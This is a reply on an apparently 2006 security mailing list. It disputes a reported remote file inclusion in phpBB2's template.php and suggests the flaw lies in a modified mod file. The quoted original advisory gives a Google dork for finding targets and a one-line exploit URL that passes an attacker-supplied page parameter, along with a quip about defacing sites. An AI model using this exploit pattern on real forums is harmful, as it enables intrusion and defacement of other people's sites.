Re: phpBB2 (template.php) Remote File Inclusion



Template.php is a file that exists in the standard phpbb2 distro but
there are also dozens of mods that change code in and/or replace the
standard template.php file to enable new functionality. Its possible
the items mentioned in the first report is based upon a hacked
template.php file and not the standard one that came with phpbb2. If
thats the case the issue is not with template.php from phpbb2's
standard distro but with a particular mod.

On 6/5/06, ad@xxxxxxxxxxxxxxxx <ad@xxxxxxxxxxxxxxxx> wrote:
template.php is an addon and not part of phpbb2, noobs....


canberx@xxxxxxxxxxxxx wrote:
> ********************************************************************
>
> *Title:
>
> *phpBB2 Remote File Include
>
> *
>
> *
>
> *Credit:
>
> *Canberx
>
> *
>
> *
>
> *Thanx:
>
> *Forewer-Partizan
>
> *
>
> *
>
> *Mail:
>
> *canberx@xxxxxxxxxxxxx www.canberx.tk
>
> *
>
> *
>
> *Google Dork:
>
> *Powered by phpBB (c) 2001, 2002 phpBB Group
>
> *
>
> *
>
> *Exploit:
>
> *www.target.com/[path_to_phpbb]/template.php?page=[attacker]
>
> *
>
> *
>
> *********************************************************************
>
>
> Plz Don't Hacked site if it already has been defaced :)
>
>
> *********************************************************************
>
>
> __________ NOD32 1.1578 (20060604) Information __________
>
> This message was checked by NOD32 antivirus system.
> http://www.eset.com
>
>
>
>






--
Have pets? Get the help you need from the Pet Advice Network.
We have 6 websites ready to help you. http://www.petadvice.net